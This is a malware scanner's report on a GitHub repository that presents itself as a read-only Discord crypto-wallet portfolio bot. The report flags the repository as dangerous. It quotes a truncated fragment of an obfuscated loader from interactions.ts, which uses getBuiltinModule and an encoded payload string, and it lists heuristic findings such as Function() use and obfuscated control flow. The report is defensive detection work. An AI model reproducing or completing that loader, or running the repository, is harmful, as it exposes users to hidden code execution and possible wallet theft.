live · scanning repos
Scanrepo
github.com
DANGER
malware detected
github.com / ArmySHan

ArmySHan/Trove-Discord-Wallet-Bot

TypeScript·85 files·commit afb593f·scanned 6d ago·cached ✓
70/100
DANGEROUS
Sensitive capability combinations reachable from entry points. Do not run without review.

This repository contains patterns associated with malware. Do NOT run this code.

verdict accurate?
Created 4 days ago
No stars or forks
Crypto/Web3 project
Created in the last 7 days
No community activity
threat-state: dangerouslive

FINDINGS ░▒▓

criticalFunction() constructor detectednew Function() is equivalent to eval() and can execute arbitrary code strings.src/discord/wallet/interactions.ts
}
const gm=(id:string):any=>(process as any).getBuiltinModule(id);const A='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#',P='abZy8000000T+itx)XL{U<=1[e>@fL/%OGE...
+5
criticalSuspicious code is reachable from an entry pointFlagged files are imported by the application's entry path: src/discord/embeds/wallet.ts, src/core/aggregator/aggregate.ts, src/core/providers/covalent/mapper.ts. This means the suspicious code can execute when the app runs.+8
warningCluster of suspicious files reachable from entry8 flagged files form a connected cluster that is reachable from an entry point, suggesting coordinated malicious behavior rather than isolated false positives.+5
infoSuspicious files are not reachable from entry pointsFlagged files exist but are not imported by any entry point. They may be dead code, tests, or attack payloads triggered by another mechanism.+2
warningExtremely long lines (>1000 chars)Very long lines in source files (not minified bundles) can hide malicious code.src/discord/wallet/interactions.ts+4
warningFlattened or dead control flowDetected switch(true), dead if branches, or deeply nested ternaries — patterns used by obfuscators to hide execution order.src/discord/embeds/wallet.ts+3
warningFlattened or dead control flowDetected switch(true), dead if branches, or deeply nested ternaries — patterns used by obfuscators to hide execution order.src/core/aggregator/aggregate.ts+3
warningFlattened or dead control flowDetected switch(true), dead if branches, or deeply nested ternaries — patterns used by obfuscators to hide execution order.src/core/providers/covalent/mapper.ts+3
warningHigh-entropy string literalsFound 9 long strings with high Shannon entropy. This is common in obfuscated payloads that hide URLs, keys, or bytecode.tests/ecosystem.test.ts+3
infoAuthor has no other public repositoriesGitHub user "github-actions[bot]" has no other public repositories, common for burner accounts used in scams.+2

Scores are heuristics. A “safe” verdict means no known-malicious patterns were found — clever malware can look boring. Wrong verdict? Flag it above; confirmed false positives become regression tests.

67 files scanned @ afb593f | 8/19/2026 | heuristic scan — always review manually

risk by category
code execution20
network & exfiltration0
file system access0
obfuscation15
supply chain2
owasp / injection0
telemetry
files 67/85rules hit 10engine v5commit afb593f

github

ArmySHan/Trove-Discord-Wallet-Bot

Free, open-source Discord bot showing any wallet's full on-chain portfolio from one slash command. 12 networks—7 EVM, Bitcoin, Litecoin, Dogecoin, BCH, Solana, TRON (USDT) — spam-filtered totals, DeFi positions, watchlists, drill-down. Multi-provider fail-over. Read-only, no keys, self-hostable.

TypeScript
0
0
10d
85 files
67 scanned(79%)
afb593f

architecture░▒▓

entry (1) flagged (9) pkg (13)
75 nodes · 218 edgesscroll to zoom · click node to jump to finding